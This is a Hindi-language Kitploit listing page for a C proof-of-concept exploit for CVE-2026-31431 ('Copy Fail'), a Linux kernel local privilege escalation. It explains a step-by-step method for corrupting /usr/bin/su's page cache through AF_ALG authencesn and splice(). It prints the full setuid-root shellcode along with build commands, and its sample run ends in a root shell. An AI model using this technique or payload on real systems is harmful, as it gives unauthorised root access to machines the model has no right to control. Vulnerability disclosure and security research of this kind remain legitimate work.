Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
copyfail — CVE-2026-31431 (कॉपी फेल) PoC - authencesn AF_ALG + splice() के माध्यम से Linux कर्नेल पेज कैश भ्रष्टाचार | Kitploit
उपकरण/GitHubGitHub/smarttfoxx/copyfail
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेलोड डेवलपमेंटबाइनरी शोषण
GitHubsmarttfoxx/copyfail

copyfail

CVE-2026-31431 (कॉपी फेल) PoC - authencesn AF_ALG + splice() के माध्यम से Linux कर्नेल पेज कैश भ्रष्टाचार

रिपॉजिटरी देखें
2073 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Copy Fail - CVE-2026-31431 C में PoC

CVE-2026-31431 (Copy Fail) के लिए स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट, C में लिखा गया।

यह कैसे काम करता है

  1. ELF पार्सिंग: PT_LOAD प्रोग्राम हेडर के माध्यम से /usr/bin/su के एंट्री पॉइंट वर्चुअल एड्रेस को फ़ाइल ऑफसेट में हल करता है
  2. AF_ALG सेटअप: शून्य कुंजी के साथ authencesn(hmac(sha256),cbc(aes)) से बाइंड करता है
  3. 4-बाइट पेज कैश राइट्स: शेलकोड पेलोड के प्रत्येक चंक के लिए:
    • sendmsg() शेलकोड बाइट्स को seqno_lo (बाइट्स 4-7) के रूप में AAD भेजता है, MSG_MORE के साथ
    • splice() लक्ष्य फ़ाइल के पेज कैश पेजों के 32 बाइट्स को AEAD प्रमाणीकरण टैग के रूप में वितरित करता है
    • recv() डिक्रिप्शन ट्रिगर करता है, authencesn की स्क्रैच राइट चेन किए गए पेज कैश पेजों में पहुँचती है, 4 नियंत्रित बाइट्स लिखती है।
  4. विशेषाधिकार वृद्धि: execl("/usr/bin/su") दूषित पेज कैश लोड करता है। 40-बाइट शेलकोड (setuid(0) + execve("/bin/sh")) setuid-root के रूप में चलता है

शेलकोड

root@kitploit:~
xor    edi, edi            ; uid = 0
mov    eax, 105            ; sys_setuid
syscall
xor    edx, edx            ; envp = NULL
push   rdx                 ; null terminator
movabs rax, "/bin/sh"      ; "/bin/sh\0"
push   rax
mov    rdi, rsp            ; filename
push   rdx                 ; NULL (argv[1])
push   rdi                 ; argv[0]
mov    rsi, rsp            ; argv
mov    eax, 59             ; sys_execve
syscall

बिल्ड

musl-gcc या स्टैटिक लिंकिंग समर्थन वाला कोई भी C कंपाइलर आवश्यक है:

root@kitploit:~
musl-gcc -static -O2 -s -o copyfail exploit.c

वैकल्पिक रूप से GCC + glibc के साथ:

root@kitploit:~
gcc -static -O2 -s -o copyfail exploit.c

उपयोग

root@kitploit:~
$ ./copyfail
[*] CVE-2026-31431 PoC (Copy Fail)
[*] /usr/bin/su entry @ file offset 0x78
[*] Patching page cache (40 bytes, 10 writes)
..........
[+] Executing /usr/bin/su
# id
uid=0(root) gid=1000(user) groups=1000(user)

संदर्भ

  • Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
  • Fix commit a664bf3d
  • Introduced by commit 72548b093ee3 (2017)

अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।

टूल डाउनलोड करें